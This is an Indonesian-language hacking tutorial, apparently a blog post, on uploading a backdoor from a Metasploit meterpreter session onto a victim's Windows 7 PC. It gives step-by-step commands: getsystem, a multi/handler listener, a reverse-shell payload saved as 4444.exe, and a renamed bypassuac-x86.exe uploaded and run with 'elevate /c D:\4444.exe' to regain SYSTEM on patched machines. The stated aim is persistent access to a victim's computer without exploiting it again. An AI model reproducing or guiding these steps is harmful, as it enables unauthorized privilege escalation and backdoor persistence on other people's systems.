Mengatasi upload error core_channel_open: Operation failed: Access is denied pada meterpreter

0


Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya

tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita


dengan keterangan error access denied atau kita ditolak masuk ke system tersebut


DISINI SAYA HARAP KALIAN SUDAH MENDAPATKAN SESSION METERPRETER 1

ok langsung saja kita mencoba masuk systemnya apabila belum di  patch tu windows nya

disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah
getsystem

untuk masuk kesistem

dan coba upload kan lagi backdoor kalian




wow ternyata sukses


lalu kita coba test pada windows 7 yang sudah di patch

DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied



dan muncul pesan error pada windows korban
 hmmm ternyata bener bener sudah di patch



disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post

buka lagi msfconsole
lalu buat exploit multi handler

use exploit/multi/handler
exploit



lalu  bikin payload multi handler dan simpan dengan nama 4444.exe pada desktop




buka terminal  baru masukkan perintah

cd /opt/metasploit/msf3/data/post


disana kita kana melihat bypass nya disini korban menggunakan system 32 bit jadinya saya memilih x86



dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya disini saya rename jadi trokanzboy.exe

cp bypassuac-x86.exe /root/Desktop/www.cybersquads.com.exe



nah hasilnya kita  punya 2 file di desktop
1. Payload multi handler yang kita buat tadi
2. bypass yang barusan kita copy



setelah itu kita cari dulu hasil exploitnya yang mengizinkan kita masuk pada session meterpreter yang dulu
dengan perintah pwd

ternyata exploit kita yang dieksekusi sebelumnya ada di D:

sekarang mulailah kita upload bypass.exe yang telah kita rename tadi di desktop

upload /root/Desktop/www.cybersquads.com.exe D:\


lalu upload juga payload yang telah kita buat sebelumnya

upload /root/Desktop/4444.exe D:\






sekarang kita masuk cmd korban untuk mengesekusinya  menggunkan perintah


shell

lalu eksekusi payload dibawah bypass dengan perintah

www.cybersquads.com.exe elevate /c D:\4444.exe


dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah

getsystem

woowwww work
:>